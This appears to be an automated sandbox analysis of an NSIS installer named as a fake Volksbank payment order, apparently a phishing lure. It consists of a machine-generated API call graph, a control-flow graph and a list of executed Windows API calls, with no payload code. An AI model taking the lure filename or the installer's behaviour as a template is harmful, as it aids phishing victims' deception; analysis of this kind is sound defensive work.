SetEnvironmentVariableW 2221->2222 2226 40331f 12 API calls 2222->2226 2223->2211 2398 40625f lstrcpynW 2225->2398 2231 4035ee 2226->2231 2244 403629 2227->2244 2231->2215 2231->2276 2232 4037f7 2235 40387b ExitProcess 2232->2235 2236 4037ff GetCurrentProcess OpenProcessToken 2232->2236 2233 4036d7 2422 4058c1 2233->2422 2241 403817 LookupPrivilegeValueW AdjustTokenPrivileges 2236->2241 2242 40384b 2236->2242 2238 403687 2399 405c38 2238->2399 2239 4036ed 2390 40582c 2239->2390 2241->2242 2243 406639 5 API calls 2242->2243 2250 403852 2243->2250 2244->2238 2244->2239 2249 403867 ExitWindowsEx 2249->2235 2254 403874 2249->2254 2250->2249 2250->2254 2251 403703 lstrcatW 2252 40370e lstrcatW lstrcmpiW 2251->2252 2253 40372a 2252->2253 2252->2276 2257 403736 2253->2257 2258 40372f 2253->2258 2455 40140b 2254->2455 2256 4036a2 2414 40625f lstrcpynW 2256->2414 2426 40580f CreateDirectoryW 2257->2426 2393 405792 CreateDirectoryW 2258->2393 2334 40396d 2263->2334 2265 40373b SetCurrentDirectoryW 2266 403756 2265->2266 2267 40374b 2265->2267 2430 40625f lstrcpynW 2266->2430 2429 40625f lstrcpynW 2267->2429 2272 4037a2 CopyFileW 2278 403764 2272->2278 2273 4037eb 2275 406025 36 API calls 2273->2275 2275->2276 2415 403893 2276->2415 2277 406281 17 API calls 2277->2278 2278->2273 2278->2277 2280 4037d6 CloseHandle 2278->2280 2431 406281 2278->2431 2448 406025 MoveFileExW 2278->2448 2452 405844 CreateProcessW 2278->2452 2280->2278 2282 4065eb wsprintfW LoadLibraryExW 2281->2282 2282->2195 2285 406655 2284->2285 2286 40665f GetProcAddress 2284->2286 2288 4065c9 3 API calls 2285->2288 2287 4033c2 2286->2287 2287->2199 2289 40665b 2288->2289 2289->2286 2289->2287 2290->2205 2291->2207 2293 405b63 2292->2293 2294 40345a CharNextW 2293->2294 2295 405b6a CharNextW 2293->2295 2294->2211 2294->2216 2295->2293 2458 4064f3 2296->2458 2298 403335 2298->2213 2299 40332b 2299->2298 2467 405b30 lstrlenW CharPrevW 2299->2467 2302 40580f 2 API calls 2303 403343 2302->2303 2470 405d80 2303->2470 2474 405d51 GetFileAttributesW CreateFileW 2306->2474 2308 402f01 2328 402f11 2308->2328 2475 40625f lstrcpynW 2308->2475 2310 402f27 2476 405b7c lstrlenW 2310->2476 2314 402f38 GetFileSize 2315 403034 2314->2315 2333 402f4f 2314->2333 2481 402e5d 2315->2481 2317 40303d 2319 40306d GlobalAlloc 2317->2319 2317->2328 2516 403308 SetFilePointer 2317->2516 2492 403308 SetFilePointer 2319->2492 2321 4030a0 2325 402e5d 6 API calls 2321->2325 2323 403056 2326 4032f2 ReadFile 2323->2326 2324 403088 2493 4030fa 2324->2493 2325->2328 2329 403061 2326->2329 2328->2220 2329->2319 2329->2328 2330 402e5d 6 API calls 2330->2333 2331 403094 2331->2328 2331->2331 2332 4030d1 SetFilePointer 2331->2332 2332->2328 2333->2315 2333->2321 2333->2328 2333->2330 2513 4032f2 2333->2513 2335 406639 5 API calls 2334->2335 2336 403981 2335->2336 2337 403987 2336->2337 2338 403999 2336->2338 2545 4061a6 wsprintfW 2337->2545 2546 40612d 2338->2546 2341 4039e8 lstrcatW 2344 403997 2341->2344 2343 40612d 3 API calls 2343->2341 2537 403c43 2344->2537 2347 405c38 18 API calls 2348 403a1a 2347->2348 2349 403aae 2348->2349 2351 40612d 3 API calls 2348->2351 2350 405c38 18 API calls 2349->2350 2352 403ab4 2350->2352 2353 403a4c 2351->2353 2354 403ac4 LoadImageW 2352->2354 2357 406281 17 API calls 2352->2357 2353->2349 2360 403a6d lstrlenW 2353->2360 2364 405b5d CharNextW 2353->2364 2355 403b6a 2354->2355 2356 403aeb RegisterClassW 2354->2356 2359 40140b 2 API calls 2355->2359 2358 403b21 SystemParametersInfoW CreateWindowExW 2356->2358 2389 403b74 2356->2389 2357->2354 2358->2355 2363 403b70 2359->2363 2361 403aa1 2360->2361 2362 403a7b lstrcmpiW 2360->2362 2367 405b30 3 API calls 2361->2367 2362->2361 2366 403a8b GetFileAttributesW 2362->2366 2369 403c43 18 API calls 2363->2369 2363->2389 2365 403a6a 2364->2365 2365->2360 2368 403a97 2366->2368 2370 403aa7 2367->2370 2368->2361 2371 405b7c 2 API calls 2368->2371 2372 403b81 2369->2372 2551 40625f lstrcpynW 2370->2551 2371->2361 2374 403c10 2372->2374 2375 403b8d ShowWindow 2372->2375 2552 405396 OleInitialize 2374->2552 2377 4065c9 3 API calls 2375->2377 2379 403ba5 2377->2379 2378 403c16 2380 403c32 2378->2380 2381 403c1a 2378->2381 2382 403bb3 GetClassInfoW 2379->2382 2386 4065c9 3 API calls 2379->2386 2385 40140b 2 API calls 2380->2385 2388 40140b 2 API calls 2381->2388 2381->2389 2383 403bc7 GetClassInfoW RegisterClassW 2382->2383 2384 403bdd DialogBoxParamW 2382->2384 2383->2384 2387 40140b 2 API calls 2384->2387 2385->2389 2386->2382 2387->2389 2388->2389 2389->2276 2391 406639 5 API calls 2390->2391 2392 4036f2 lstrcatW 2391->2392 2392->2251 2392->2252 2394 4057e3 GetLastError 2393->2394 2395 403734 2393->2395 2394->2395 2396 4057f2 SetFileSecurityW 2394->2396 2395->2265 2396->2395 2397 405808 GetLastError 2396->2397 2397->2395 2398->2223 2574 40625f lstrcpynW 2399->2574 2401 405c49 2575 405bdb CharNextW CharNextW 2401->2575 2404 403693 2404->2276 2413 40625f lstrcpynW 2404->2413 2405 4064f3 5 API calls 2411 405c5f 2405->2411 2406 405c90 lstrlenW 2407 405c9b 2406->2407 2406->2411 2409 405b30 3 API calls 2407->2409 2410 405ca0 GetFileAttributesW 2409->2410 2410->2404 2411->2404 2411->2406 2412 405b7c 2 API calls 2411->2412 2581 4065a2 FindFirstFileW 2411->2581 2412->2406 2413->2256 2414->2263 2416 4038ab 2415->2416 2417 40389d CloseHandle 2415->2417 2584 4038d8 2416->2584 2417->2416 2423 4058d6 2422->2423 2424 4036e5 ExitProcess 2423->2424 2425 4058ea MessageBoxIndirectW 2423->2425 2425->2424 2427 405823 GetLastError 2426->2427 2428 40581f 2426->2428 2427->2428 2428->2265 2429->2266 2430->2278 2438 40628e 2431->2438 2432 4064d9 2433 403795 DeleteFileW 2432->2433 2642 40625f lstrcpynW 2432->2642 2433->2272 2433->2278 2435 4064a7 lstrlenW 2435->2438 2436 406281 10 API calls 2436->2435 2438->2432 2438->2435 2438->2436 2440 4063bc GetSystemDirectoryW 2438->2440 2441 40612d 3 API calls 2438->2441 2442 4063cf GetWindowsDirectoryW 2438->2442 2443 4064f3 5 API calls 2438->2443 2444 406281 10 API calls 2438->2444 2445 40644a lstrcatW 2438->2445 2446 406403 SHGetSpecialFolderLocation 2438->2446 2640 4061a6 wsprintfW 2438->2640 2641 40625f lstrcpynW 2438->2641 2440->2438 2441->2438 2442->2438 2443->2438 2444->2438 2445->2438 2446->2438 2447 40641b SHGetPathFromIDListW CoTaskMemFree 2446->2447 2447->2438 2449 406046 2448->2449 2450 406039 2448->2450 2449->2278 2643 405eab 2450->2643 2453 405883 2452->2453 2454 405877 CloseHandle 2452->2454 2453->2278 2454->2453 2456 401389 2 API calls 2455->2456 2457 401420 2456->2457 2457->2235 2465 406500 2458->2465 2459 406576 2460 40657b CharPrevW 2459->2460 2462 40659c 2459->2462 2460->2459 2461 406569 CharNextW 2461->2459 2461->2465 2462->2299 2463 405b5d CharNextW 2463->2465 2464 406555 CharNextW 2464->2465 2465->2459 2465->2461 2465->2463 2465->2464 2466 406564 CharNextW 2465->2466 2466->2461 2468 40333d 2467->2468 2469 405b4c lstrcatW 2467->2469 2468->2302 2469->2468 2471 405d8d GetTickCount GetTempFileNameW 2470->2471 2472 40334e 2471->2472 2473 405dc3 2471->2473 2472->2213 2473->2471 2473->2472 2474->2308 2475->2310 2477 405b8a 2476->2477 2478 405b90 CharPrevW 2477->2478 2479 402f2d 2477->2479 2478->2477 2478->2479 2480 40625f lstrcpynW 2479->2480 2480->2314 2482 402e66 2481->2482 2483 402e7e 2481->2483 2484 402e76 2482->2484 2485 402e6f DestroyWindow 2482->2485 2486 402e86 2483->2486 2487 402e8e GetTickCount 2483->2487 2484->2317 2485->2484 2517 406675 2486->2517 2489 402e9c CreateDialogParamW ShowWindow 2487->2489 2490 402ebf 2487->2490 2489->2490 2490->2317 2492->2324 2495 403113 2493->2495 2494 403141 2497 4032f2 ReadFile 2494->2497 2495->2494 2534 403308 SetFilePointer 2495->2534 2498 40314c 2497->2498 2499 40328b 2498->2499 2500 40315e GetTickCount 2498->2500 2502 403275 2498->2502 2501 4032cd 2499->2501 2506 40328f 2499->2506 2500->2502 2509 40318a 2500->2509 2503 4032f2 ReadFile 2501->2503 2502->2331 2503->2502 2504 4032f2 ReadFile 2504->2509 2505 4032f2 ReadFile 2505->2506 2506->2502 2506->2505 2507 405e03 WriteFile 2506->2507 2507->2506 2508 4031e0 GetTickCount 2508->2509 2509->2502 2509->2504 2509->2508 2510 403205 MulDiv wsprintfW 2509->2510 2532 405e03 WriteFile 2509->2532 2521 4052c3 2510->2521 2535 405dd4 ReadFile 2513->2535 2516->2323 2518 406692 PeekMessageW 2517->2518 2519 402e8c 2518->2519 2520 406688 DispatchMessageW 2518->2520 2519->2317 2520->2518 2522 4052de 2521->2522 2523 405380 2521->2523 2524 4052fa lstrlenW 2522->2524 2525 406281 17 API calls 2522->2525 2523->2509 2526 405323 2524->2526 2527 405308 lstrlenW 2524->2527 2525->2524 2529 405336 2526->2529 2530 405329 SetWindowTextW 2526->2530 2527->2523 2528 40531a lstrcatW 2527->2528 2528->2526 2529->2523 2531 40533c SendMessageW SendMessageW SendMessageW 2529->2531 2530->2529 2531->2523 2533 405e21 2532->2533 2533->2509 2534->2494 2536 403305 2535->2536 2536->2333 2538 403c57 2537->2538 2559 4061a6 wsprintfW 2538->2559 2540 403cc8 2560 403cfc 2540->2560 2542 4039f8 2542->2347 2543 403ccd 2543->2542 2544 406281 17 API calls 2543->2544 2544->2543 2545->2344 2563 4060cc 2546->2563 2549 406161 RegQueryValueExW RegCloseKey 2550 4039c9 2549->2550 2550->2341 2550->2343 2551->2349 2567 404240 2552->2567 2554 4053e0 2555 404240 SendMessageW 2554->2555 2557 4053f2 OleUninitialize 2555->2557 2556 4053b9 2556->2554 2570 401389 2556->2570 2557->2378 2559->2540 2561 406281 17 API calls 2560->2561 2562 403d0a SetWindowTextW 2561->2562 2562->2543 2564 4060db 2563->2564 2565 4060e4 RegOpenKeyExW 2564->2565 2566 4060df 2564->2566 2565->2566 2566->2549 2566->2550 2568 404258 2567->2568 2569 404249 SendMessageW 2567->2569 2568->2556 2569->2568 2572 401390 2570->2572 2571 4013fe 2571->2556 2572->2571 2573 4013cb MulDiv SendMessageW 2572->2573 2573->2572 2574->2401 2576 405bf8 2575->2576 2579 405c0a 2575->2579 2578 405c05 CharNextW 2576->2578 2576->2579 2577 405c2e 2577->2404 2577->2405 2578->2577 2579->2577 2580 405b5d CharNextW 2579->2580 2580->2579 2582 4065c3 2581->2582 2583 4065b8 FindClose 2581->2583 2582->2411 2583->2582 2585 4038e6 2584->2585 2586 4038eb FreeLibrary GlobalFree 2585->2586 2587 4038b0 2585->2587 2586->2586 2586->2587 2588 40596d 2587->2588 2589 405c38 18 API calls 2588->2589 2590 40598d 2589->2590 2591 405995 DeleteFileW 2590->2591 2592 4059ac 2590->2592 2598 4036c6 OleUninitialize 2591->2598 2593 405acc 2592->2593 2627 40625f lstrcpynW 2592->2627 2593->2598 2599 4065a2 2 API calls 2593->2599 2595 4059d2 2596 4059e5 2595->2596 2597 4059d8 lstrcatW 2595->2597 2601 405b7c 2 API calls 2596->2601 2600 4059eb 2597->2600 2598->2232 2598->2233 2602 405af1 2599->2602 2603 4059fb lstrcatW 2600->2603 2604 405a06 lstrlenW FindFirstFileW 2600->2604 2601->2600 2602->2598 2605 405af5 2602->2605 2603->2604 2604->2593 2612 405a28 2604->2612 2606 405b30 3 API calls 2605->2606 2607 405afb 2606->2607 2609 405925 5 API calls 2607->2609 2608 405aaf FindNextFileW 2608->2612 2613 405ac5 FindClose 2608->2613 2611 405b07 2609->2611 2614 405b21 2611->2614 2615 405b0b 2611->2615 2612->2608 2619 40596d 60 API calls 2612->2619 2621 405a79 2612->2621 2628 40625f lstrcpynW 2612->2628 2613->2593 2617 4052c3 24 API calls 2614->2617 2615->2598 2618 4052c3 24 API calls 2615->2618 2617->2598 2620 405b18 2618->2620 2619->2621 2623 406025 36 API calls 2620->2623 2621->2608 2622 4052c3 24 API calls 2621->2622 2624 4052c3 24 API calls 2621->2624 2626 406025 36 API calls 2621->2626 2629 405925 2621->2629 2622->2608 2625 405b1f 2623->2625 2624->2621 2625->2598 2626->2621 2627->2595 2628->2612 2637 405d2c GetFileAttributesW 2629->2637 2632 405952 2632->2621 2633 405940 RemoveDirectoryW 2635 40594e 2633->2635 2634 405948 DeleteFileW 2634->2635 2635->2632 2636 40595e SetFileAttributesW 2635->2636 2636->2632 2638 405931 2637->2638 2639 405d3e SetFileAttributesW 2637->2639 2638->2632 2638->2633 2638->2634 2639->2638 2640->2438 2641->2438 2642->2433 2644 405f01 GetShortPathNameW 2643->2644 2645 405edb 2643->2645 2646 406020 2644->2646 2647 405f16 2644->2647 2670 405d51 GetFileAttributesW CreateFileW 2645->2670 2646->2449 2647->2646 2650 405f1e wsprintfA 2647->2650 2649 405ee5 CloseHandle GetShortPathNameW 2649->2646 2651 405ef9 2649->2651 2652 406281 17 API calls 2650->2652 2651->2644 2651->2646 2653 405f46 2652->2653 2671 405d51 GetFileAttributesW CreateFileW 2653->2671 2655 405f53 2655->2646 2656 405f62 GetFileSize GlobalAlloc 2655->2656 2657 405f84 2656->2657 2658 406019 CloseHandle 2656->2658 2659 405dd4 ReadFile 2657->2659 2658->2646 2660 405f8c 2659->2660 2660->2658 2672 405cb6 lstrlenA 2660->2672 2663 405fa3 lstrcpyA 2666 405fc5 2663->2666 2664 405fb7 2665 405cb6 4 API calls 2664->2665 2665->2666 2667 405ffc SetFilePointer 2666->2667 2668 405e03 WriteFile 2667->2668 2669 406012 GlobalFree 2668->2669 2669->2658 2670->2649 2671->2655 2673 405cf7 lstrlenA 2672->2673 2674 405cd0 lstrcmpiA 2673->2674 2675 405cff 2673->2675 2674->2675 2676 405cee CharNextA 2674->2676 2675->2663 2675->2664 2676->2673 2954 100016b6 2955 100016e5 2954->2955 2956 10001b18 22 API calls 2955->2956 2957 100016ec 2956->2957 2958 100016f3 2957->2958 2959 100016ff 2957->2959 2960 10001272 2 API calls 2958->2960 2961 10001726 2959->2961 2962 10001709 2959->2962 2965 100016fd 2960->2965 2963 10001750 2961->2963 2964 1000172c 2961->2964 2966 1000153d 3 API calls 2962->2966 2968 1000153d 3 API calls 2963->2968 2967 100015b4 3 API calls 2964->2967 2969 1000170e 2966->2969 2970 10001731 2967->2970 2968->2965 2971 100015b4 3 API calls 2969->2971 2973 10001272 2 API calls 2970->2973 2972 10001714 2971->2972 2974 10001272 2 API calls 2972->2974 2975 10001737 GlobalFree 2973->2975 2976 1000171a GlobalFree 2974->2976 2975->2965 2977 1000174b GlobalFree 2975->2977 2976->2965 2977->2965 2978 10002a77 2979 10002a8f 2978->2979 2980 1000158f 2 API calls 2979->2980 2981 10002aaa 2980->2981 2982 402dd7 2983 402e02 2982->2983 2984 402de9 SetTimer 2982->2984 2985 402e57 2983->2985 2986 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 2983->2986 2984->2983 2986->2985 2987 10002238 2988 10002296 2987->2988 2989 100022cc 2987->2989 2988->2989 2990 100022a8 GlobalAlloc 2988->2990 2990->2988 2991 10001058 2993 10001074 2991->2993 2992 100010dd 2993->2992 2994 10001092 2993->2994 2995 10001516 GlobalFree 2993->2995 2996 10001516 GlobalFree 2994->2996 2995->2994 2997 100010a2 2996->2997 2998 100010b2 2997->2998 2999 100010a9 GlobalSize 2997->2999 3000 100010b6 GlobalAlloc 2998->3000 3001 100010c7 2998->3001 2999->2998 3002 1000153d 3 API calls 3000->3002 3003 100010d2 GlobalFree 3001->3003 3002->3001 3003->2992 2680 10001759 2681 10001789 2680->2681 2722 10001b18 2681->2722 2683 10001790 2684 100018a6 2683->2684 2685 100017a1 2683->2685 2686 100017a8 2683->2686 2770 10002286 2685->2770 2754 100022d0 2686->2754 2691 1000180c 2695 10001812 2691->2695 2696 1000184e 2691->2696 2692 100017ee 2783 100024a4 2692->2783 2693 100017d7 2705 100017cd 2693->2705 2780 10002b57 2693->2780 2694 100017be 2698 100017c4 2694->2698 2704 100017cf 2694->2704 2700 100015b4 3 API calls 2695->2700 2702 100024a4 10 API calls 2696->2702 2698->2705 2764 1000289c 2698->2764 2707 10001828 2700->2707 2713 10001840 2702->2713 2703 100017f4 2794 100015b4 2703->2794 2774 10002640 2704->2774 2705->2691 2705->2692 2710 100024a4 10 API calls 2707->2710 2709 100017d5 2709->2705 2710->2713 2714 10001895 2713->2714 2805 10002467 2713->2805 2714->2684 2716 1000189f GlobalFree 2714->2716 2716->2684 2719 10001881 2719->2714 2809 1000153d wsprintfW 2719->2809 2720 1000187a FreeLibrary 2720->2719 2812 1000121b GlobalAlloc 2722->2812 2724 10001b3c 2813 1000121b GlobalAlloc 2724->2813 2726 10001d7a GlobalFree GlobalFree GlobalFree 2727 10001d97 2726->2727 2745 10001de1 2726->2745 2728 100020ee 2727->2728 2736 10001dac 2727->2736 2727->2745 2730 10002110 GetModuleHandleW 2728->2730 2728->2745 2729 10001c1d GlobalAlloc 2750 10001b47 2729->2750 2731 10002121 LoadLibraryW 2730->2731 2732 10002136 2730->2732 2731->2732 2731->2745 2820 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2732->2820 2733 10001c68 lstrcpyW 2737 10001c72 lstrcpyW 2733->2737 2734 10001c86 GlobalFree 2734->2750 2736->2745 2816 1000122c 2736->2816 2737->2750 2738 10002188 2740 10002195 lstrlenW 2738->2740 2738->2745 2739 10002048 2739->2745 2746 10002090 lstrcpyW 2739->2746 2821 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2740->2821 2742 10002148 2742->2738 2753 10002172 GetProcAddress 2742->2753 2745->2683 2746->2745 2747 10001cc4 2747->2750 2814 1000158f GlobalSize GlobalAlloc 2747->2814 2748 10001f37 GlobalFree 2748->2750 2749 100021af 2749->2745 2750->2726 2750->2729 2750->2733 2750->2734 2750->2737 2750->2739 2750->2745 2750->2747 2750->2748 2752 1000122c 2 API calls 2750->2752 2819 1000121b GlobalAlloc 2750->2819 2752->2750 2753->2738 2755 100022e8 2754->2755 2756 1000122c GlobalAlloc lstrcpynW 2755->2756 2758 10002410 GlobalFree 2755->2758 2759 100023ba GlobalAlloc CLSIDFromString 2755->2759 2760 1000238f GlobalAlloc WideCharToMultiByte 2755->2760 2763 100023d9 2755->2763 2823 100012ba 2755->2823 2756->2755 2758->2755 2761 100017ae 2758->2761 2759->2758 2760->2758 2761->2693 2761->2694 2761->2705 2763->2758 2827 100025d4 2763->2827 2766 100028ae 2764->2766 2765 10002953 EnumWindows 2767 10002971 2765->2767 2766->2765 2768 10002a62 GetLastError 2767->2768 2769 10002a6d 2767->2769 2768->2769 2769->2705 2771 10002296 2770->2771 2773 100017a7 2770->2773 2772 100022a8 GlobalAlloc 2771->2772 2771->2773 2772->2771 2773->2686 2777 1000265c 2774->2777 2775 100026c0 2778 100026c5 GlobalSize 2775->2778 2779 100026cf 2775->2779 2776 100026ad GlobalAlloc 2776->2779 2777->2775 2777->2776 2778->2779 2779->2709 2781 10002b62 2780->2781 2782 10002ba2 GlobalFree 2781->2782 2830 1000121b GlobalAlloc 2783->2830 2785 10002506 MultiByteToWideChar 2790 100024ae 2785->2790 2786 1000252b StringFromGUID2 2786->2790 2787 1000253c lstrcpynW 2787->2790 2788 1000254f wsprintfW 2788->2790 2789 1000256c GlobalFree 2789->2790 2790->2785 2790->2786 2790->2787 2790->2788 2790->2789 2791 100025a7 GlobalFree 2790->2791 2792 10001272 2 API calls 2790->2792 2831 100012e1 2790->2831 2791->2703 2792->2790 2835 1000121b GlobalAlloc 2794->2835 2796 100015ba 2797 100015c7 lstrcpyW 2796->2797 2799 100015e1 2796->2799 2801 100015fb 2797->2801 2800 100015e6 wsprintfW 2799->2800 2799->2801 2800->2801 2802 10001272 2801->2802 2803 100012b5 GlobalFree 2802->2803 2804 1000127b GlobalAlloc lstrcpynW 2802->2804 2803->2713 2804->2803 2806 10002475 2805->2806 2808 10001861 2805->2808 2807 10002491 GlobalFree 2806->2807 2806->2808 2807->2806 2808->2719 2808->2720 2810 10001272 2 API calls 2809->2810 2811 1000155e 2810->2811 2811->2714 2812->2724 2813->2750 2815 100015ad 2814->2815 2815->2747 2822 1000121b GlobalAlloc 2816->2822 2818 1000123b lstrcpynW 2818->2745 2819->2750 2820->2742 2821->2749 2822->2818 2824 100012c1 2823->2824 2825 1000122c 2 API calls 2824->2825 2826 100012df 2825->2826 2826->2755 2828 100025e2 VirtualAlloc 2827->2828 2829 10002638 2827->2829 2828->2829 2829->2763 2830->2790 2832 100012ea 2831->2832 2833 1000130c 2831->2833 2832->2833 2834 100012f0 lstrcpyW 2832->2834 2833->2790 2834->2833 2835->2796 2836 403d1b 2837 403d33 2836->2837 2838 403e6e 2836->2838 2837->2838 2839 403d3f 2837->2839 2840 403ebf 2838->2840 2841 403e7f GetDlgItem GetDlgItem 2838->2841 2843 403d4a SetWindowPos 2839->2843 2844 403d5d 2839->2844 2842 403f19 2840->2842 2853 401389 2 API calls 2840->2853 2845 4041f4 18 API calls 2841->2845 2847 404240 SendMessageW 2842->2847 2867 403e69 2842->2867 2843->2844 2848 403d62 ShowWindow 2844->2848 2849 403d7a 2844->2849 2846 403ea9 SetClassLongW 2845->2846 2850 40140b 2 API calls 2846->2850 2863 403f2b 2847->2863 2848->2849 2851 403d82 DestroyWindow 2849->2851 2852 403d9c 2849->2852 2850->2840 2906 40417d 2851->2906 2854 403da1 SetWindowLongW 2852->2854 2855 403db2 2852->2855 2856 403ef1 2853->2856 2854->2867 2858 403e5b 2855->2858 2859 403dbe GetDlgItem 2855->2859 2856->2842 2860 403ef5 SendMessageW 2856->2860 2857 40417f DestroyWindow EndDialog 2857->2906 2916 40425b 2858->2916 2864 403dd1 SendMessageW IsWindowEnabled 2859->2864 2869 403dee 2859->2869 2860->2867 2861 40140b 2 API calls 2861->2863 2862 4041ae ShowWindow 2862->2867 2863->2857 2863->2861 2866 406281 17 API calls 2863->2866 2863->2867 2872 4041f4 18 API calls 2863->2872 2897 4040bf DestroyWindow 2863->2897 2907 4041f4 2863->2907 2864->2867 2864->2869 2866->2863 2868 403df3 2913 4041cd 2868->2913 2869->2868 2870 403dfb 2869->2870 2873 403e42 SendMessageW 2869->2873 2874 403e0e 2869->2874 2870->2868 2870->2873 2872->2863 2873->2858 2876 403e16 2874->2876 2877 403e2b 2874->2877 2875 403e29 2875->2858 2879 40140b 2 API calls 2876->2879 2878 40140b 2 API calls 2877->2878 2880 403e32 2878->2880 2879->2868 2880->2858 2880->2868 2882 403fa6 GetDlgItem 2883 403fc3 ShowWindow KiUserCallbackDispatcher 2882->2883 2884 403fbb 2882->2884 2910 404216 KiUserCallbackDispatcher 2883->2910 2884->2883 2886 403fed EnableWindow 2891 404001 2886->2891 2887 404006 GetSystemMenu EnableMenuItem SendMessageW 2888 404036 SendMessageW 2887->2888 2887->2891 2888->2891 2890 403cfc 18 API calls 2890->2891 2891->2887 2891->2890 2911 404229 SendMessageW 2891->2911 2912 40625f lstrcpynW 2891->2912 2893 404065 lstrlenW 2894 406281 17 API calls 2893->2894 2895 40407b SetWindowTextW 2894->2895 2896 401389 2 API calls 2895->2896 2896->2863 2898 4040d9 CreateDialogParamW 2897->2898 2897->2906 2899 40410c 2898->2899 2898->2906 2900 4041f4 18 API calls 2899->2900 2901 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2900->2901 2902 401389 2 API calls 2901->2902 2903 40415d 2902->2903 2903->2867 2904 404165 ShowWindow 2903->2904 2905 404240 SendMessageW 2904->2905 2905->2906 2906->2862 2906->2867 2908 406281 17 API calls 2907->2908 2909 4041ff SetDlgItemTextW 2908->2909 2909->2882 2910->2886 2911->2891 2912->2893 2914 4041d4 2913->2914 2915 4041da SendMessageW 2913->2915 2914->2915 2915->2875 2917 404273 GetWindowLongW 2916->2917 2918 4042fc 2916->2918 2917->2918 2919 404284 2917->2919 2918->2867 2920 404293 GetSysColor 2919->2920 2921 404296 2919->2921 2920->2921 2922 4042a6 SetBkMode 2921->2922 2923 40429c SetTextColor 2921->2923 2924 4042c4 2922->2924 2925 4042be GetSysColor 2922->2925 2923->2922 2926 4042d5 2924->2926 2927 4042cb SetBkColor 2924->2927 2925->2924 2926->2918 2928 4042e8 DeleteObject 2926->2928 2929 4042ef CreateBrushIndirect 2926->2929 2927->2926 2928->2929 2929->2918 3010 1000103d 3011 1000101b 5 API calls 3010->3011 3012 10001056 3011->3012

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 403350-40338d SetErrorMode GetVersion 1 4033a0 0->1 2 40338f-403397 call 406639 0->2 4 4033a5-4033b9 call 4065c9 lstrlenA 1->4 2->1 7 403399 2->7 9 4033bb-4033d7 call 406639 * 3 4->9 7->1 16 4033e8-403449 #17 OleInitialize SHGetFileInfoW call 40625f GetCommandLineW call 40625f GetModuleHandleW 9->16 17 4033d9-4033df 9->17 24 403453-40346d call 405b5d CharNextW 16->24 25 40344b-403452 16->25 17->16 21 4033e1 17->21 21->16 28 403473-403479 24->28 29 403584-40359e GetTempPathW call 40331f 24->29 25->24 31 403482-403486 28->31 32 40347b-403480 28->32 38 4035a0-4035be GetWindowsDirectoryW lstrcatW call 40331f 29->38 39 4035f6-403610 DeleteFileW call 402ec1 29->39 34 403488-40348c 31->34 35 40348d-403491 31->35 32->31 32->32 34->35 36 403550-40355d call 405b5d 35->36 37 403497-40349d 35->37 57 403561-403567 36->57 58 40355f-403560 36->58 40 4034b8-4034f1 37->40 41 40349f-4034a7 37->41 38->39 56 4035c0-4035f0 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40331f 38->56 52 4036c1-4036d1 call 403893 OleUninitialize 39->52 53 403616-40361c 39->53 48 4034f3-4034f8 40->48 49 40350e-403548 40->49 46 4034a9-4034ac 41->46 47 4034ae 41->47 46->40 46->47 47->40 48->49 54 4034fa-403502 48->54 49->36 55 40354a-40354e 49->55 75 4037f7-4037fd 52->75 76 4036d7-4036e7 call 4058c1 ExitProcess 52->76 60 4036b1-4036b8 call 40396d 53->60 61 403622-40362d call 405b5d 53->61 63 403504-403507 54->63 64 403509 54->64 55->36 65 40356f-40357d call 40625f 55->65 56->39 56->52 57->28 59 40356d 57->59 58->57 67 403582 59->67 74 4036bd 60->74 77 40367b-403685 61->77 78 40362f-403664 61->78 63->49 63->64 64->49 65->67 67->29 74->52 80 40387b-403883 75->80 81 4037ff-403815 GetCurrentProcess OpenProcessToken 75->81 85 403687-403695 call 405c38 77->85 86 4036ed-403701 call 40582c lstrcatW 77->86 82 403666-40366a 78->82 83 403885 80->83 84 403889-40388d ExitProcess 80->84 88 403817-403845 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 40384b-403859 call 406639 81->89 91 403673-403677 82->91 92 40366c-403671 82->92 83->84 85->52 101 403697-4036ad call 40625f * 2 85->101 102 403703-403709 lstrcatW 86->102 103 40370e-403728 lstrcatW lstrcmpiW 86->103 88->89 99 403867-403872 ExitWindowsEx 89->99 100 40385b-403865 89->100 91->82 96 403679 91->96 92->91 92->96 96->77 99->80 105 403874-403876 call 40140b 99->105 100->99 100->105 101->60 102->103 103->52 104 40372a-40372d 103->104 108 403736 call 40580f 104->108 109 40372f call 405792 104->109 105->80 117 40373b-403749 SetCurrentDirectoryW 108->117 116 403734 109->116 116->117 118 403756-40377f call 40625f 117->118 119 40374b-403751 call 40625f 117->119 123 403784-4037a0 call 406281 DeleteFileW 118->123 119->118 126 4037e1-4037e9 123->126 127 4037a2-4037b2 CopyFileW 123->127 126->123 129 4037eb-4037f2 call 406025 126->129 127->126 128 4037b4-4037d4 call 406025 call 406281 call 405844 127->128 128->126 138 4037d6-4037dd CloseHandle 128->138 129->52 138->126
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00403373
                                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00403379
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
                                                                                                                                                                                                                                          • #17.COMCTL32(?,00000006,?,0000000A), ref: 004033E9
                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004033F0
                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,?,00000000), ref: 0040340C
                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 00403421
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,?,00000006,?,0000000A), ref: 00403434
